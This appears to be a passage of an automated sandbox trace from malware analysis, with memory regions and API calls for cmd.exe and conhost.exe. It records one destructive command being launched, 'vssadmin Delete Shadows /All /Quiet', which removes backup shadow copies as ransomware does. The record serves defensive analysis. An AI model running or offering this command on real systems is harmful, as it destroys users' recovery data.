	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1147
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1148
	        start_va = 0x7fd10000
	          end_va = 0x7fe0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007fd10000"
	        filename = ""

Region:
	              id = 1536
	        start_va = 0x1c0000
	          end_va = 0x27dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1537
	        start_va = 0x290000
	          end_va = 0x29ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000290000"
	        filename = ""

Region:
	              id = 1538
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1539
	        start_va = 0x2a0000
	          end_va = 0x2dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000002a0000"
	        filename = ""

Region:
	              id = 1540
	        start_va = 0x4780000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004780000"
	        filename = ""

Region:
	              id = 1541
	        start_va = 0x4880000
	          end_va = 0x4a1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 1542
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1896
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 1992
	        start_va = 0x4a20000
	          end_va = 0x4d56fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 49
	os_tid = 0x132c

	[0242.463] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0242.464] GetProcessHeap () returned 0x4680000
	[0242.464] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0x400a) returned 0x468b8e0
	[0242.464] GetProcessHeap () returned 0x4680000
	[0242.464] RtlFreeHeap (HeapHandle=0x4680000, Flags=0x0, BaseAddress=0x468b8e0) returned 1
	[0242.467] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0242.467] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0242.467] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0242.467] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0242.467] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0242.467] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0242.467] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0242.467] GetProcessHeap () returned 0x4680000
	[0242.467] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0x58) returned 0x4689000
	[0242.467] GetProcessHeap () returned 0x4680000
	[0242.468] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0x1a) returned 0x4689060
	[0242.470] GetProcessHeap () returned 0x4680000
	[0242.470] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0x52) returned 0x4689088
	[0242.472] GetConsoleTitleW (in: lpConsoleTitle=0x18f300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0242.961] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0242.961] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0242.961] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0242.961] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0242.961] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0242.961] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0242.961] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0242.961] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0242.961] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0242.961] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0242.962] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0242.963] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0242.964] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0242.965] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0242.966] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0242.967] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0242.967] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0242.967] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0242.968] GetProcessHeap () returned 0x4680000
	[0242.968] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0x210) returned 0x46890e8
	[0242.968] GetProcessHeap () returned 0x4680000
	[0242.968] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0x64) returned 0x4689300
	[0242.968] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0242.969] GetProcessHeap () returned 0x4680000
	[0242.969] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0x418) returned 0x46805c8
	[0242.970] SetErrorMode (uMode=0x0) returned 0x0
	[0242.970] SetErrorMode (uMode=0x1) returned 0x0
	[0242.970] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46805d0, lpFilePart=0x18ee0c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18ee0c*="Desktop") returned 0x1d
	[0242.970] SetErrorMode (uMode=0x0) returned 0x1
	[0242.970] GetProcessHeap () returned 0x4680000
	[0242.970] RtlReAllocateHeap (Heap=0x4680000, Flags=0x0, Ptr=0x46805c8, Size=0x56) returned 0x46805c8
	[0242.970] GetProcessHeap () returned 0x4680000
	[0242.970] RtlSizeHeap (HeapHandle=0x4680000, Flags=0x0, MemoryPointer=0x46805c8) returned 0x56
	[0242.971] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0242.971] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0242.971] GetProcessHeap () returned 0x4680000
	[0242.971] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0x182) returned 0x4689370
	[0242.971] GetProcessHeap () returned 0x4680000
	[0242.972] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0x2fc) returned 0x4680628
	[0243.001] GetProcessHeap () returned 0x4680000
	[0243.001] RtlReAllocateHeap (Heap=0x4680000, Flags=0x0, Ptr=0x4680628, Size=0x184) returned 0x4680628
	[0243.001] GetProcessHeap () returned 0x4680000
	[0243.001] RtlSizeHeap (HeapHandle=0x4680000, Flags=0x0, MemoryPointer=0x4680628) returned 0x184
	[0243.001] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0243.001] GetProcessHeap () returned 0x4680000
	[0243.001] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0xe0) returned 0x4689500
	[0243.079] GetProcessHeap () returned 0x4680000
	[0243.079] RtlReAllocateHeap (Heap=0x4680000, Flags=0x0, Ptr=0x4689500, Size=0x76) returned 0x4689500
	[0243.079] GetProcessHeap () returned 0x4680000
	[0243.079] RtlSizeHeap (HeapHandle=0x4680000, Flags=0x0, MemoryPointer=0x4689500) returned 0x76
	[0243.081] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0243.081] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18eb98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb98) returned 0xffffffff
	[0243.083] GetLastError () returned 0x2
	[0243.083] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0243.083] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18eb98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb98) returned 0xffffffff
	[0243.085] GetLastError () returned 0x2
	[0243.085] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0243.085] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18eb98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb98) returned 0x4689580
	[0243.086] GetProcessHeap () returned 0x4680000
	[0243.086] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x0, Size=0x14) returned 0x46879f8
	[0243.086] FindClose (in: hFindFile=0x4689580 | out: hFindFile=0x4689580) returned 1
	[0243.086] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18eb98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb98) returned 0xffffffff
	[0243.086] GetLastError () returned 0x2
	[0243.086] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18eb98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb98) returned 0x4689580
	[0243.087] GetProcessHeap () returned 0x4680000
	[0243.087] RtlReAllocateHeap (Heap=0x4680000, Flags=0x0, Ptr=0x46879f8, Size=0x4) returned 0x4680598
	[0243.087] FindClose (in: hFindFile=0x4689580 | out: hFindFile=0x4689580) returned 1
	[0243.087] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0243.087] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0243.087] GetConsoleTitleW (in: lpConsoleTitle=0x18f08c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0243.336] InitializeProcThreadAttributeList (in: lpAttributeList=0x18efb8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18ef9c | out: lpAttributeList=0x18efb8, lpSize=0x18ef9c) returned 1
	[0243.336] UpdateProcThreadAttribute (in: lpAttributeList=0x18efb8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18efa4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18efb8, lpPreviousValue=0x0) returned 1
	[0243.336] GetStartupInfoW (in: lpStartupInfo=0x18eff0 | out: lpStartupInfo=0x18eff0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0243.336] GetProcessHeap () returned 0x4680000
	[0243.337] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0x18) returned 0x4687718
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0243.337] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0243.338] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0243.339] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0243.339] GetProcessHeap () returned 0x4680000
	[0243.340] RtlFreeHeap (HeapHandle=0x4680000, Flags=0x0, BaseAddress=0x4687718) returned 1
	[0243.340] GetProcessHeap () returned 0x4680000
	[0243.340] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0xa) returned 0x4684438
	[0243.340] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0243.343] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=U: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18ef40*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=U: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef8c | out: lpCommandLine="vssadmin  Delete Shadows /For=U: /All /Quiet ", lpProcessInformation=0x18ef8c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1384, dwThreadId=0x1240)) returned 1
	[0243.370] CloseHandle (hObject=0xa4) returned 1
	[0243.370] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0243.370] GetProcessHeap () returned 0x4680000
	[0243.370] RtlFreeHeap (HeapHandle=0x4680000, Flags=0x0, BaseAddress=0x468ad38) returned 1
	[0243.370] GetEnvironmentStringsW () returned 0x468a190*
	[0243.370] GetProcessHeap () returned 0x4680000
	[0243.370] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0xb9c) returned 0x468ad38
	[0243.370] memcpy (in: _Dst=0x468ad38, _Src=0x468a190, _Size=0xb9c | out: _Dst=0x468ad38) returned 0x468ad38
	[0243.370] FreeEnvironmentStringsA (penv="=") returned 1
	[0243.371] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0259.295] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18ef24 | out: lpExitCode=0x18ef24*=0x2) returned 1
	[0259.296] CloseHandle (hObject=0xa8) returned 1
	[0259.297] _vsnwprintf (in: _Buffer=0x18f00c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ef2c | out: _Buffer="00000002") returned 8
	[0259.298] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0259.299] GetProcessHeap () returned 0x4680000
	[0259.299] RtlFreeHeap (HeapHandle=0x4680000, Flags=0x0, BaseAddress=0x468ad38) returned 1
	[0259.300] GetEnvironmentStringsW () returned 0x468a190*
	[0259.300] GetProcessHeap () returned 0x4680000
	[0259.300] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0xbc2) returned 0x468c4b0
	[0259.300] memcpy (in: _Dst=0x468c4b0, _Src=0x468a190, _Size=0xbc2 | out: _Dst=0x468c4b0) returned 0x468c4b0
	[0259.300] FreeEnvironmentStringsA (penv="=") returned 1
	[0259.300] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0259.300] GetProcessHeap () returned 0x4680000
	[0259.300] RtlFreeHeap (HeapHandle=0x4680000, Flags=0x0, BaseAddress=0x468c4b0) returned 1
	[0259.300] GetEnvironmentStringsW () returned 0x468a190*
	[0259.301] GetProcessHeap () returned 0x4680000
	[0259.301] RtlAllocateHeap (HeapHandle=0x4680000, Flags=0x8, Size=0xbc2) returned 0x468c4b0
	[0259.301] memcpy (in: _Dst=0x468c4b0, _Src=0x468a190, _Size=0xbc2 | out: _Dst=0x468c4b0) returned 0x468c4b0
	[0259.301] FreeEnvironmentStringsA (penv="=") returned 1
	[0259.301] GetProcessHeap () returned 0x4680000
	[0259.301] RtlFreeHeap (HeapHandle=0x4680000, Flags=0x0, BaseAddress=0x4684438) returned 1
	[0259.301] DeleteProcThreadAttributeList (in: lpAttributeList=0x18efb8 | out: lpAttributeList=0x18efb8) 
	[0259.301] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0259.301] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0259.512] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0259.512] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0260.072] _get_osfhandle (_FileHandle=0) returned 0x38
	[0260.072] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0260.486] SetConsoleInputExeNameW () returned 0x1
	[0260.486] GetConsoleOutputCP () returned 0x1b5
	[0260.575] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0260.576] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0260.847] exit (_Code=2) 

Thread:
	id = 75
	os_tid = 0x1010


Process:
	id = "17"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x32269000"
	os_pid = "0x1318"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "16"
	os_parent_pid = "0xef0"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1160
	        start_va = 0x29600000
	          end_va = 0x297fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000029600000"
	        filename = ""

Region:
	              id = 1161
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1162
	        start_va = 0xcc29430000
	          end_va = 0xcc2946ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000cc29430000"
	        filename = ""

Region:
	              id = 1163
	        start_va = 0xcc29600000
	          end_va = 0xcc297fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000cc29600000"
	        filename = ""

Region:
	              id = 1164
	        start_va = 0x230a6710000
	          end_va = 0x230a672ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000230a6710000"
	        filename = ""

Region:
	              id = 1165
	        start_va = 0x230a6730000
	          end_va = 0x230a6744fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000230a6730000"
	        filename = ""

Region:
	              id = 1166
	        start_va = 0x7df5ff5c0000
	          end_va = 0x7ff5ff5bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
